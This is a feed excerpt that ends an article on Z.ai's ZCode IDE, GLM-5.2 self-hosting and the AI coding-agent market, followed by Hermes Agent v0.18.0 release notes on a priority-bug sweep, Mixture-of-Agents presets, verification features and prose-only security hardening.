disable a commercially deployed AI model overnight, the traditional evaluation criteria of developer experience, benchmark scores, and pricing become secondary to a more fundamental question: Will this tool still work tomorrow?</p><p>The event exposed the inadequacy of standard enterprise contract language. An investigation by <a href="https://www.fifthrow.com/blog/us-export-control-order-and-global-suspension-of-fable-5-mythos-5-operationalizing-compliance-as-a">FifthRow</a> found that almost all standard Data Processing Addenda, SaaS agreements, and procurement SLAs "relied on vague 'force majeure' or 'compliance with law' catch-alls, not on precise, actionable regulatory suspension or kill-switch clauses."</p><p>ZCode's <a href="https://aiidelist.com/ide/zcode">BYOK architecture </a>and <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>'s MIT-licensed open weights offer a partial answer. A development team can download the model, host it on its own infrastructure, and run ZCode against it without ever touching Z.ai's cloud — eliminating both American export-control risk and Chinese data-sovereignty concerns in a single move. The catch is that anyone using Z.ai's cloud API remains subject to Chinese law, a consideration that evaporates only with pure self-hosting.</p><p>Gartner analysts <a href="https://news.creeta.com/en/gartner-enterprise-ai-coding-agents-2026/">have warned</a> that governance, pricing, support, workflows, commercial maturity, and market durability matter as much as developer experience and model capabilities when evaluating coding agent vendors for enterprise-wide adoption. By that measure, ZCode faces a steep climb. It is not open source itself; Linux support remains in beta; and security reviewers have flagged the need for careful evaluation of its credential handling, particularly for remote development over SSH and messaging-platform-triggered tasks — an agent that can be summoned from WeChat involves access paths that should be mapped before trusting it with anything sensitive.</p><h2><b>Inside the $10 billion race where model labs are becoming full-stack IDE companies</b></h2><p><a href="https://zcode.z.ai/">ZCode</a> enters one of the most crowded and fastest-moving markets in enterprise software. Enterprise AI coding agents are capturing a growing share of enterprise software engineering spend, with the market estimated at roughly $9.8 billion to $11.0 billion annualized as of April 2026, according to <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">Gartner</a>. A defining shift this year, the analyst firm noted, is "the movement of frontier model providers into direct competition with application-layer vendors" — precisely the pattern ZCode embodies.</p><p>Gartner codified this evolution in May when it <a href="https://openai.com/index/gartner-2026-agentic-coding-leader/">renamed its annual Magic Quadrant</a> from "AI Code Assistants" to "Enterprise AI Coding Agents," defining the category as "autonomous or semiautonomous software engineering solutions that perceive context, translate human intent into multistep plans, and execute and verify those steps across code, tests and related engineering artifacts." The 2026 Magic Quadrant names Anthropic, Cursor, GitHub, and OpenAI as Leaders. Z.ai was not among the 12 vendors evaluated — an absence that underscores both the company's nascent enterprise sales presence outside China and the Western-centric lens through which the analyst community still views the market.</p><p>The competitive landscape is daunting. Cursor is the <a href="https://www.bloomberg.com/news/articles/2026-03-02/cursor-recurring-revenue-doubles-in-three-months-to-2-billion">$2 billion ARR IDE</a> that feels like VS Code with a supercharger. Claude Code reached <a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation">approximately $2.5 billion</a> in annualized revenue by early 2026. Google relaunched <a href="https://blog.google/innovation-and-ai/technology/developers-tools/google-io-2026-developer-highlights/">Antigravity 2.0</a> at I/O in May, and Cognition retired the Windsurf brand, relaunching the IDE as <a href="https://devin.ai/desktop/">Devin Desktop</a> with the Agent Command Center as the default surface.</p><p>Against these entrenched players, ZCode's pitch rests on three pillars: deep first-party integration with GLM-5.2 that no third-party editor can replicate, aggressive pricing that starts at a fraction of Western competitors, and MIT-licensed open weights that allow enterprises to self-host — eliminating the regulatory kill-switch risk that the Fable ban made viscerally real.</p><h2><b>Z.ai's real challenge is turning a $128 billion valuation into a global developer tools business</b></h2><p><a href="http://z.ai/">Z.ai</a> controls the model (<a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>), the subscription layer (<a href="https://z.ai/subscribe">the GLM Coding Plan</a>), and the IDE (<a href="https://zcode.z.ai/">ZCode</a>) — a tightly coupled stack that optimizes for performance but concentrates switching costs. For the company, the business logic is clear. Its most reliable revenue stream has been on-premises deployments for Chinese government agencies, state-owned banks, and energy conglomerates. In full-year 2025, on-premises deployment revenue reached RMB 534 million, growing over 100 percent year-over-year and accounting for 73.7 percent of total revenue with a gross margin of 48.8 percent. ZCode and the GLM Coding Plan represent the company's bid to build a comparable revenue engine in cloud-based developer tools — globally, not just in China.</p><p>The early signals are encouraging for <a href="http://z.ai/">Z.ai</a>, if anecdotal. Community reception on X was enthusiastic, with one early user calling the tool "super stable" and others clamoring for more Coding Plan capacity. "Bro, can't snag your family's Coding Plan? When are you gonna stock up on more cards?" <a href="https://x.com/realchendahuang/status/2072361920976593163">one user wrote in Chinese</a>, suggesting demand is already outstripping supply.</p><p>But the hard questions loom large. Can a Chinese AI company build trust with Western enterprise buyers amid escalating technology tensions? Can ZCode's ecosystem mature fast enough to compete with Cursor's polished UX, Claude Code's deep agent primitives, and GitHub Copilot's unmatched distribution? And can Z.ai sustain a company valued at $128 billion while still losing money? </p><p>What is no longer in question is the competitive dynamic itself. Three weeks ago, a U.S. government directive proved that access to the world's best coding model can vanish overnight. Today, a Chinese lab is shipping a free IDE, an open-source model trained on zero American chips, and a subscription plan that costs less per month than a single lunch in Manhattan. The AI coding agent market did not just become global this summer. It became a market where the fallback option might be better than the thing it's falling back from — and that changes the calculus for every engineering leader choosing a toolchain in the second half of 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.18.0 (2026.7.1) — The Judgment Release]]></title>
<description><![CDATA[Hermes Agent v0.18.0 (v2026.7.1)
Release Date: July 1, 2026
Since v0.17.0: ~1,720 commits · 998 merged PRs · 2,215 files changed · ~251,000 insertions · ~41,000 deletions · 949 issues closed · 370+ community contributors

The Judgment Release. Over the last week and a half the team put nearly all...]]></description>
<link>https://tsecurity.de/de/3639600/downloads/hermes-agent-v0180-202671-the-judgment-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639600/downloads/hermes-agent-v0180-202671-the-judgment-release/</guid>
<pubDate>Wed, 01 Jul 2026 22:16:35 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.18.0 (v2026.7.1)</h1>
<p><strong>Release Date:</strong> July 1, 2026<br>
<strong>Since v0.17.0:</strong> ~1,720 commits · 998 merged PRs · 2,215 files changed · ~251,000 insertions · ~41,000 deletions · <strong>949 issues closed</strong> · <strong>370+ community contributors</strong></p>
<blockquote>
<p><strong>The Judgment Release.</strong> Over the last week and a half the team put nearly all of its effort into one goal: resolve <strong>every P0 and P1 issue and PR in the entire Hermes Agent repo</strong> — and as of this release, <strong>100% of them are closed.</strong> Zero open P0s. Zero open P1s. That's <strong>~700 highest-priority items</strong> cleared as part of <strong>~1,950 total issues and PRs closed</strong> this window. We intend to keep P0/P1 at zero from here on.</p>
<p>On top of that clean-sweep, v0.18.0 is about how <em>well</em> Hermes thinks and how it <em>knows when its work is actually done</em>. Mixture-of-Agents became a first-class citizen — named ensembles of models you can pick like any other model, with every reference model's reasoning shown to you and the aggregator's answer streamed live. The agent learned to verify its own work against evidence instead of vibes, <code>/goal</code> gained completion contracts, and <code>/learn</code> + <code>/journey</code> turned self-improvement into something you can see and steer. Underneath, the gateway became genuinely deployable-at-scale (scale-to-zero, drain coordination), the desktop grew first-class coding projects and a playable memory graph, and subagents can now fan out in the background.</p>
</blockquote>
<h2>🎯 The P0/P1 Clean Sweep — 100% resolved</h2>
<p>This is the release headline. For a week and a half the team hammered the priority backlog day and night, and every single P0 and P1 across the whole repo is now closed:</p>
<table>
<thead>
<tr>
<th>Priority</th>
<th>Issues closed</th>
<th>PRs merged</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>P0</strong> (critical)</td>
<td>3</td>
<td>8</td>
</tr>
<tr>
<td><strong>P1</strong> (high)</td>
<td>493</td>
<td>188</td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td><strong>496</strong></td>
<td><strong>196</strong></td>
</tr>
</tbody>
</table>
<p>That's <strong>~692 highest-priority items resolved</strong> in twelve days — and at the moment the sweep completed, the open P0/P1 count hit <strong>0 across the entire repo.</strong> The final cluster to fall was the interrupt-protected-compression sibling-fork bug (issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785584067" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/56391" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/56391/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/56391">#56391</a>) and its fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785996667" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/56416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56416/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/56416">#56416</a>), closed on an all-nighter right before this release cut.</p>
<p>Special shoutout to <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong>, who burned through the priority backlog day and night alongside the core team — the cron reliability wave, the compression-fork fix, the credential-exfil hardening, and a huge share of the P1 closures are his.</p>
<p>We're keeping P0/P1 at <strong>0</strong> from here forward. 🫡</p>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Mixture-of-Agents is now a first-class model you can pick</strong> — MoA used to be a mode you toggled; now every named MoA preset shows up as a selectable model under a <code>moa</code> provider, right alongside Claude, GPT, and Grok in every model picker (CLI, TUI, desktop, gateway). Pick "my-council" the same way you'd pick any model, and Hermes routes your prompt through that ensemble automatically. An ensemble of frontier models deliberating on your hardest questions is now one selection away, on every surface. (<a href="https://github.com/NousResearch/hermes-agent/pull/46081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46081/hovercard">#46081</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53548" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53548/hovercard">#53548</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53561/hovercard">#53561</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>See every model's reasoning, then watch the answer stream in</strong> — When a MoA ensemble runs, each reference model's full output now renders as its own labelled block — you can read what GPT-5 thought, what Claude thought, and what Grok thought, before the aggregator synthesizes them into one answer. And that final answer now streams to you live instead of appearing all at once after a long silence. This works in the CLI, the TUI, and the desktop app. You get to watch the committee deliberate, not just read the verdict. (<a href="https://github.com/NousResearch/hermes-agent/pull/53793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53793/hovercard">#53793</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53855/hovercard">#53855</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55625/hovercard">#55625</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56101/hovercard">#56101</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The agent verifies its own work — "done" means proven, not claimed</strong> — Hermes now records verification evidence for coding work and can decide it's finished by actually running your project's checks, not by asserting success. <code>/goal</code> gained <strong>completion contracts</strong>: you state what "done" looks like, and the standing-goal loop judges completion against that evidence instead of stopping when the model feels like it. There's a <code>pre_verify</code> hook for wiring in custom checks and a one-time migration that tunes the defaults sensibly. The difference between "I think I fixed it" and "the tests pass, here's proof." (<a href="https://github.com/NousResearch/hermes-agent/pull/50501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50501/hovercard">#50501</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52285/hovercard">#52285</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55413/hovercard">#55413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53552/hovercard">#53552</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong><code>/learn</code> — turn anything into a reusable skill by describing it</strong> — Run <code>/learn &lt;anything&gt;</code> and Hermes distills a reusable skill out of whatever you point it at — a directory, a URL, or just the workflow you walked it through five minutes ago. It writes the skill to the standards in your CONTRIBUTING.md automatically. The next time you need that workflow, it's already there. Teaching Hermes a new trick is now a single command, not a manual skill-authoring session. (<a href="https://github.com/NousResearch/hermes-agent/pull/51506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51506/hovercard">#51506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52372/hovercard">#52372</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong><code>/journey</code> — a playable timeline of everything Hermes has learned about you</strong> — The CLI and TUI gained <code>/journey</code>, a learning timeline that shows the memories and skills Hermes has accumulated over time — and you can edit or delete any of them right from the view. Pair it with the desktop's new <strong>memory graph</strong> (a top-down, playable radial timeline of memories and skills) and for the first time you can actually <em>see</em> what your agent knows, watch it grow, and prune what's wrong. Your agent's memory stops being a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/55555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55555/hovercard">#55555</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55859/hovercard">#55859</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55226/hovercard">#55226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Delegate a pile of work and keep going — background fan-out</strong> — <code>delegate_task</code> can now fan out multiple subagents that all run in the <strong>background</strong>: your chat is never blocked, and when every subagent finishes, their results come back as a single consolidated turn. Kick off "research these five competitors in parallel" or "audit these three modules," then carry on with something else while a small fleet works. When it's all done, you get one clean summary instead of babysitting each one. (<a href="https://github.com/NousResearch/hermes-agent/pull/49734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49734/hovercard">#49734</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>First-class coding Projects in the desktop app</strong> — The desktop app gained real, per-profile <strong>Projects</strong> — a sidebar of your codebases, a coding rail, a review pane, git worktree management, and agent-facing project tools, all backed by a proper <code>project → repo → lane</code> model. Instead of scattered chat sessions, your coding work is organized into projects the agent understands and can act on. It's the desktop turning into an actual coding cockpit. (<a href="https://github.com/NousResearch/hermes-agent/pull/49037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49037/hovercard">#49037</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54385" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54385/hovercard">#54385</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54517/hovercard">#54517</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Run Hermes at scale — scale-to-zero and drain coordination</strong> — The gateway can now go <strong>dormant when idle</strong> and quiesce cleanly before a restart, migration, or auto-update — without dropping in-flight conversations. A hosted or relay-only Hermes can scale to zero when nobody's talking to it and wake back up on demand, and disruptive lifecycle actions coordinate an external drain so nobody gets cut off mid-turn. Running Hermes for a team or as a hosted service just got a lot more production-grade. (<a href="https://github.com/NousResearch/hermes-agent/pull/52243" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52243/hovercard">#52243</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52937" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52937/hovercard">#52937</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54824/hovercard">#54824</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</p>
</li>
<li>
<p><strong>Cheaper self-improvement — smarter background review</strong> — The post-turn self-improvement fork (the one that decides whether to save a memory or skill) now routes to an auxiliary model, digests context instead of replaying the whole conversation, and adapts its cadence — so the "learn from what just happened" loop that runs after your turns costs a fraction of what it used to. You keep the self-improvement, you stop paying full main-model price for it. (<a href="https://github.com/NousResearch/hermes-agent/pull/49252" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49252/hovercard">#49252</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Compose your next prompt in your editor — <code>/prompt</code></strong> — <code>/prompt</code> opens your <code>$EDITOR</code> so you can hand-write a long, multi-line prompt in real markdown instead of fighting a one-line input box. Draft a detailed spec, a structured question, or a big paste, save, and it's queued as your next message. Small thing, huge quality-of-life win for anyone who writes Hermes more than a sentence at a time. (<a href="https://github.com/NousResearch/hermes-agent/pull/50509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50509/hovercard">#50509</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Google Vertex AI — Gemini through your GCP service account, no static key</strong> — Vertex AI is now a first-class provider for Gemini models over Vertex's OpenAI-compatible endpoint. The reason a plain custom-provider setup always died mid-session is that Vertex has no static API key — every request needs a short-lived OAuth2 access token (~1h TTL) minted from a service-account JSON or Application Default Credentials. Hermes now mints and auto-refreshes those tokens for you, so if your org runs Gemini through Google Cloud, you point Hermes at your service account and it just works — no token-pasting, no mid-session expiry. (<a href="https://github.com/NousResearch/hermes-agent/pull/56363" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56363/hovercard">#56363</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>)</p>
</li>
<li>
<p><strong>Security round</strong> — This window hardened several surfaces: MCP-config persistence attack surface locked down, cron <code>base_url</code> overrides that could exfiltrate provider credentials blocked, a non-reusable sentinel for prefix secrets in file reads, Slack app-level (<code>xapp-</code>) token redaction, a browser cloud-metadata floor enforced on every backend, and an <code>aiohttp</code> CVE floor across the lazy messaging paths. Fewer ways for a prompt-injected or misconfigured session to leak a credential. (<a href="https://github.com/NousResearch/hermes-agent/pull/50476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50476/hovercard">#50476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56196/hovercard">#56196</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54166/hovercard">#54166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56227/hovercard">#56227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52349/hovercard">#52349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56237/hovercard">#56237</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claudlos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claudlos">@claudlos</a>)</p>
</li>
</ul>
<hr>
<h2>🧠 Mixture-of-Agents (MoA)</h2>
<p>MoA graduated from a mode to a first-class part of the model system this window.</p>
<ul>
<li><strong>Presets as selectable virtual models</strong> — each named MoA preset appears as a model under provider <code>moa</code>; pick it in any model picker and Hermes routes through the ensemble (<a href="https://github.com/NousResearch/hermes-agent/pull/46081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46081/hovercard">#46081</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53561/hovercard">#53561</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53775/hovercard">#53775</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/moa</code> is now one-shot sugar</strong> — runs a single prompt through the default preset and restores your model afterward; persistent switching goes through the model picker (<a href="https://github.com/NousResearch/hermes-agent/pull/53548" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53548/hovercard">#53548</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Reference-model output shown as labelled blocks</strong> in CLI, TUI, and desktop — read each model's reasoning before the aggregator's synthesis (<a href="https://github.com/NousResearch/hermes-agent/pull/53793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53793/hovercard">#53793</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53855/hovercard">#53855</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Aggregator response streams live</strong> instead of appearing whole after a silence (<a href="https://github.com/NousResearch/hermes-agent/pull/55625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55625/hovercard">#55625</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>References see full tool state and fire on every user/tool response</strong>; advisory references end on a user turn and get a reference-role system prompt (<a href="https://github.com/NousResearch/hermes-agent/pull/54016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54016/hovercard">#54016</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54007/hovercard">#54007</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Opt-in full-turn trace persistence to JSONL</strong> (<code>moa.save_traces</code>) for debugging and eval (<a href="https://github.com/NousResearch/hermes-agent/pull/56101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56101/hovercard">#56101</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Reliability: reference + aggregator models called through their provider's real route; context window resolved from the aggregator (not the 256K default); auxiliary tasks resolve to the aggregator; virtual provider blocked as a reference/aggregator slot; tolerant of hand-edited preset config (<a href="https://github.com/NousResearch/hermes-agent/pull/53580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53580/hovercard">#53580</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53780" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53780/hovercard">#53780</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53827" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53827/hovercard">#53827</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53281" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53281/hovercard">#53281</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53275/hovercard">#53275</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53556" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53556/hovercard">#53556</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MoA slot provider-identity unified on the single <code>call_llm</code> chokepoint; HermesBench results documented (<a href="https://github.com/NousResearch/hermes-agent/pull/55991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55991/hovercard">#55991</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53206/hovercard">#53206</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>✅ Verification &amp; Goals — the agent proves its work</h2>
<ul>
<li><strong>Completion contracts for <code>/goal</code></strong> — state what "done" looks like; the standing-goal loop judges against evidence, not the model's say-so (<a href="https://github.com/NousResearch/hermes-agent/pull/50501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50501/hovercard">#50501</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/goal wait &lt;pid&gt;</code></strong> — park the standing-goal loop on a background process instead of re-poking the agent (<a href="https://github.com/NousResearch/hermes-agent/pull/50503" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50503/hovercard">#50503</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
